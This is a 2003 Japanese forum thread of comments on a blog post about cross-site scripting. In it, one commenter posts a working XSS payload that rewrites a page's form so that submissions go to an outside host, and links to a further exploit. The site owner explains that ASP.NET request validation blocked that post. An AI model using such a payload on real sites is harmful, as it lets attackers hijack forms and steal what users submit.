新生鳩丸掲示板♯

bakera.jp > 新生鳩丸掲示板♯ > スレッド内全記事表示 (記事 132 からのスレッド)

スレッド内全記事表示 (記事 132 からのスレッド)

これは「DOM万歳(XSS大王つづき) | 水無月ばけらのえび日記」に関連するコメントです。

[132] Re: えび日記 : 「DOM万歳(XSS大王つづき)」

いわい (2003年6月24日 22時28分)

やりすぎというか、やられすぎというか(謎)。

XSSって怖いですね(ベタ)。

[134] Re: えび日記 : 「DOM万歳(XSS大王つづき)」

えむけい (2003年6月24日 23時11分)

test

[135] Re: えび日記 : 「DOM万歳(XSS大王つづき)」

えむけい (2003年6月24日 23時12分)

なんかタグを含む投稿で? エラーになります。再挑戦

"><script>document.forms[0].action="http://altba.com";document.forms[0].method="get"</script><span

[136] Re: えび日記 : 「DOM万歳(XSS大王つづき)」

えむけい (2003年6月24日 23時15分)

なぜかここに投稿しようとするとエラーになるのでよりaccesibleな【謎】exploitはとりあえずポータル墓場に投稿しておきます。

http://white.sakura.ne.jp/~rryu/hakaba/bbs.cgi?mode=mes&id=1351

[137] Re: えび日記 : 「DOM万歳(XSS大王つづき)」

ばけら (2003年6月25日 11時52分)

>なぜかここに投稿しようとするとエラーになるので

 どんなエラーが出ていましたか?

 実は ASP.NET 自体にヤバ目な POST を弾く機能があったりするので、そのせいかもしれません。

[138] Re: えび日記 : 「DOM万歳(XSS大王つづき)」

ばけら (2003年6月25日 11時56分)

>>なぜかここに投稿しようとするとエラーになるので

 調査しましたが、やはり ASP.NET 自身がこういうエラーを出してますね。

================

危険な可能性のある Request.Form 値がクライアントから検出されました。

説明 : 要求の検証により、危険性のあるクライアント入力値が検出されました。要求の処理は中止されました。この値は、クロス サイト スクリプト攻撃などのアプリケーションのセキュリティ問題を引き起こす可能性があります。ページ ディレクティブか、 構成セクションの validateRequest=false を設定することによって要求の検証を無効にできます。しかしこの場合、アプリケーションですべての入力を明示的に確認することをお勧めします。

例外の詳細: System.Web.HttpRequestValidationException: 危険な可能性のある Request.Form 値がクライアントから検出されました。

================

 この機能はオフにできるはずなので、ちょっと調べてみます。

[3769] 未承認メッセージ (投稿元:220.80.30.43)

reogkzt lyrqnhj (2006年7月25日 17時21分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[3797] 未承認メッセージ (投稿元:58.233.138.152)

ncwevljtm vkhc (2006年8月17日 7時50分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

最近の日記

関わった本など